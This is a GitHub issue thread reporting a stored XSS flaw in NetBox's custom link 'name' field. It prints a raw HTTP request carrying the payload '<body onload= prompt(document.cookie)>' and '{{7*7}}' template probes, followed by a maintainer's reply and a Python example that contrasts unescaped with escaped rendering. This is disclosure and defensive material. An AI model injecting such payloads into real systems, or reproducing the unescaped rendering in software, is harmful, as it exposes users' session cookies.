netbox-community / netbox

The premier source of truth powering network automation. Open source under Apache 2. Try NetBox Cloud free: https://netboxlabs.com/free-netbox-cloud/
http://netboxlabs.com/oss/netbox/
Apache License 2.0

XSS in api: /extras/custom-links/add, /extras/custom-links/{id}/edit/ both with param: name, /core/config-revisions/add/ with param: BANNER_MAINTENANCE #17596

Closed minhquan202 closed 1 month ago

minhquan202 commented 1 month ago

Deployment Type

NetBox Cloud

NetBox Version

v4.1.1

Python Version

3.10

Steps to Reproduce

1. Add or edit a Custom Link with malicious script tags in the Name parameter.

2. Access an object type that uses the Custom Link.

3. Immediately, boom: stored XSS is executed.

Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:8000/extras/custom-links/add/
Content-Type: multipart/form-data; boundary=---------------------------300193789523924448502163188369
Content-Length: 1589
Origin: http://localhost:8000
Connection: close
Cookie: csrftoken=GPFwHFgQsCVRlXGYb2Efv9gKs2SXEiIN; sessionid=jv3bmrc6goo62qohlkckic0eolv7nrde
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red
Priority: u=1

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="csrfmiddlewaretoken"

oDVU0Umj4Oip7YXSKVBW5T4WgmBHvaJZUiqgxpsZmg36iLtGLN51qSawyejuZihC
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="name"

<body onload= prompt(document.cookie)>
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="object_types"

46
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="weight"

100
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="group_name"

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="button_class"

outline-dark
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="enabled"

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="enabled"

on
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="new_window"

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="link_text"

{{7*7}}
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="link_url"

{{7*7}}
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="_create"

-----------------------------300193789523924448502163188369--


Expected Behavior

spam, csrf token hijacking, combined with other vulnerabilities to create a chain that harms the system

Observed Behavior


arthanson commented 1 month ago

@minhquan202 Thank you for opening a bug report. Unfortunately, the information you have provided is not sufficient for someone else to attempt to reproduce the reported behavior. Remember, each bug report must include detailed steps that someone else can follow on a clean, empty NetBox installation to reproduce the exact problem you're experiencing. These instructions should include the creation of any involved objects, any configuration changes, and complete accounting of the actions being taken. Also be sure that your report does not reference data on the public NetBox demo, as that is subject to change at any time by an outside party and cannot be relied upon for bug reports.

Can you please provide what script you are using and

minhquan202 commented 1 month ago

I just want to inform you that using mark_safe without escaping causes the application to have an XSS vulnerability. I leave it to you to fix it in the next updates. As for the steps, I have provided them. Please read carefully and think about my bug report. Whether you fix this or not has nothing to do with me; this is for your users. All information has been presented by me in my bug report; please read carefully.

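The comment above attributes the bug to mark_safe being applied to a value that was never escaped. The following is an added illustration, not NetBox's or Django's own code: it builds the kind of anchor a custom link renders, once by interpolating the reported "name" value straight into markup (the pattern mark_safe on raw input produces) and once with every user-controlled value escaped first, which is what Django's autoescaping or format_html would do. Only the standard library is used so it runs offline; the CSS class and URL are assumed sample values.

```python
import html
import re

# Payload copied verbatim from the "name" form field in the bug report above.
REPORTED_NAME = "<body onload= prompt(document.cookie)>"

# Matches the name of every HTML tag in a rendered string.
TAG_RE = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)")


def render_link_unsafe(name: str, url: str) -> str:
    """The pattern the report describes: user-controlled text is dropped
    into markup unescaped and the result is treated as safe HTML.
    A name containing a tag therefore becomes live markup."""
    return f'<a class="btn btn-outline-dark" href="{url}">{name}</a>'


def render_link_escaped(name: str, url: str) -> str:
    """Hardened form: escape each user-controlled value before it enters
    the markup. quote=True also neutralises quotes inside attribute values,
    so the href cannot be broken out of either."""
    safe_url = html.escape(url, quote=True)
    safe_name = html.escape(name, quote=True)
    return f'<a class="btn btn-outline-dark" href="{safe_url}">{safe_name}</a>'


def injected_tags(rendered: str) -> set[str]:
    """Defender-side check: which tags appear in the output other than the
    single <a> the link is supposed to consist of? Anything extra came
    from user input and would execute in the viewer's browser."""
    return {m.group(1).lower() for m in TAG_RE.finditer(rendered)} - {"a"}


if __name__ == "__main__":
    # Assumed sample URL for an object page; any path works for the demo.
    url = "/dcim/sites/1/"
    print("unsafe  ->", injected_tags(render_link_unsafe(REPORTED_NAME, url)))
    print("escaped ->", injected_tags(render_link_escaped(REPORTED_NAME, url)))
```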

arthanson commented 1 month ago

Closing as not enough information has been provided. I tried a simple script in name and Link Text and checked it on the Site page and did not see it activating. If reproduction steps can be included as specified in the response above then we can re-open and look at addressing.

minhquan202 commented 1 month ago

OK, I will create the ticket again and give you clearer information. OK?
